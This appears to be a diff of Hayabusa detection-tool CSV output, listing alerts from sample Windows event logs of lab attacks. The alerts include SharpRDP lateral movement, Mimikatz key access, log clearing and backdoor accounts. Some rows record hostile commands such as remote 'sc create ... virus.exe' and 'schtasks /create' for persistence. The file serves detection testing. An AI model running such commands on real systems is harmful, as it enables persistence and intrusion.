+2020-07-10 05:57:40.825 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:52.909 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ATACORE01$ | Computer: - | IP Addr: 10.23.42.30 | LID: 0x64f5ef5,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:58:11.977 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f6471,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:58:11.981 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 0x64f64a3,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:58:12.004 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f64ca,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f64e1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f64f3,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 06:22:31.163 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx"
+2020-07-10 06:25:41.773 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx"
+2020-07-10 07:00:11.181 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52543 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:17.584 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 2568 | PGUID: 747F3D96-9371-5F07-0000-00102D024400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:27.033 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52545 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 7356 | PGUID: 747F3D96-937F-5F07-0000-0010EBDD4400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:40.413 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52546 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:45.589 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 7976 | PGUID: 747F3D96-938D-5F07-0000-001043A84500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:48.105 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: c:\windows\system32\notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x68b4a | PID: 8032 | PGUID: 747F3D96-9390-5F07-0000-00105CBC4500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:58.550 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52547 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:01:03.898 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 7456 | PGUID: 747F3D96-939F-5F07-0000-0010888E4600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:01:06.427 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" | LID: 0x68b4a | PID: 7200 | PGUID: 747F3D96-93A2-5F07-0000-00108EC54600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:05:58.373 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 3096 | PGUID: 747F3D96-94C3-5F07-0000-001080B40100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:06:07.487 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x3bfab | PID: 3248 | PGUID: 747F3D96-94CF-5F07-0000-0010BD590400,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 19:20:34.910 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: rdpclip | Process: C:\Windows\System32\rdpclip.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\svchost.exe -k NetworkService -s TermService | LID: 0x3bfab | PID: 3304 | PGUID: 747F3D96-40F2-5F08-0000-0010D8A92C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
+2020-07-10 19:20:35.589 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:53627 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 824 | PGUID: 747F3D96-1350-5F08-0000-001014C50000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
+2020-07-10 19:20:37.637 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""\\tsclient\c\temp\stack\a.exe"" | Process: \\tsclient\c\temp\stack\a.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x3bfab | PID: 4236 | PGUID: 747F3D96-40F5-5F08-0000-001095812D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
+2020-07-10 19:20:37.637 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
+2020-07-11 22:21:11.693 +09:00,wec02,70,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
+2020-07-11 22:21:17.514 +09:00,wec02,70,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
+2020-07-11 22:21:18.640 +09:00,wec02,70,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
+2020-07-12 02:16:42.576 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x3023704,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx
+2020-07-12 02:16:42.592 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx
+2020-07-12 02:16:50.984 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx
+2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx
+2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x3023704,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx
+2020-07-12 02:18:01.228 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx
+2020-07-12 06:09:03.249 +09:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: schtasks /create /s fs02 /tn tasks_test_hacker2 /tr myapp.exe /sc daily /mo 10 | Path: C:\Windows\System32\schtasks.exe | PID: 0x1e18 | User: lambda-user | LID: 0x1d41a5fa,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-Scheduled task creation.evtx
+2020-07-12 06:38:17.351 +09:00,fs02.offsec.lan,4698,info,,Task Created,"Name: \smbservice | Content: <?xml version=""1.0"" encoding=""UTF-16""?> <Task version=""1.2"" xmlns=""http://schemas.microsoft.com/windows/2004/02/mit/task""> <RegistrationInfo> <Date>2020-07-11T21:38:17</Date> <Author>OFFSEC\lambda-user</Author> </RegistrationInfo> <Triggers> <TimeTrigger> <StartBoundary>2020-07-11T15:20:00</StartBoundary> <Enabled>true</Enabled> </TimeTrigger> </Triggers> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>true</AllowHardTerminate> <StartWhenAvailable>false</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <Duration>PT10M</Duration> <WaitTimeout>PT1H</WaitTimeout> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>PT72H</ExecutionTimeLimit> <Priority>7</Priority> </Settings> <Actions Context=""Author""> <Exec> <Command>C:\WINDOWS\Temp\MpCmdRun.bat</Command> </Exec> </Actions> <Principals> <Principal id=""Author""> <UserId>S-1-5-18</UserId> <RunLevel>LeastPrivilege</RunLevel> </Principal> </Principals> </Task> | User: admmig | LID: 0x3246775",../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by SMBexec (sups. arg.).evtx
+2020-07-12 06:38:17.445 +09:00,fs02.offsec.lan,4699,info,,Task Deleted,Name: \smbservice | User: admmig | LID: 0x3246ace,../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4699_ScheduledTaskDeleted.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by SMBexec (sups. arg.).evtx
+2020-07-12 06:38:17.445 +09:00,fs02.offsec.lan,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,../hayabusa-rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by SMBexec (sups. arg.).evtx
+2020-07-12 06:46:39.786 +09:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc \\fs02\ create hacker-testl binPath=""virus.exe"" | Path: C:\Windows\System32\sc.exe | PID: 0x53c | User: admmig | LID: 0x58dbaa",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Command SC to create service on remote host.evtx
+2020-07-12 06:49:56.318 +09:00,fs02.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-Random service installation.evtx
+2020-07-12 06:50:07.213 +09:00,fs02.offsec.lan,7045,info,Persis,Service Installed,Name: bad-task | Path: virusé.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-Random service installation.evtx
+2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,low,Persis,Local User Account Created,User: admin-kriss | SID: S-1-5-21-4230534742-2542757381-3142984815-1166,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-4726 Fast created-deleted user.evtx
+2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,low,Persis,Local User Account Created,User: admin-kriss | SID: S-1-5-21-4230534742-2542757381-3142984815-1166,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Admin like user created.evtx
+2020-07-12 14:12:58.295 +09:00,jump01.offsec.lan,4720,low,Persis,Local User Account Created,User: hacking-local-acct | SID: S-1-5-21-1470532092-3758209836-3742276719-1001,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Local user created.evtx
+2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-1470532092-3758209836-3742276719-1001 | Group: Administrators | LID: 0x58d874,../hayabusa-rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-User added to local admin groups.evtx
+2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-1470532092-3758209836-3742276719-1001 | Group: Administrators | LID: 0x58d874,../hayabusa-rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-4733-Quick added-removed user from local group.evtx
+2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1158 | Group: Group02 | LID: 0x807afcb,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx
+2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1158 | Group: Group02 | LID: 0x807afcb,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx
+2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group01 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group01 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group02 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group02 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group03 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group03 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group04 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group04 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group05 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group05 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group06 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group06 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
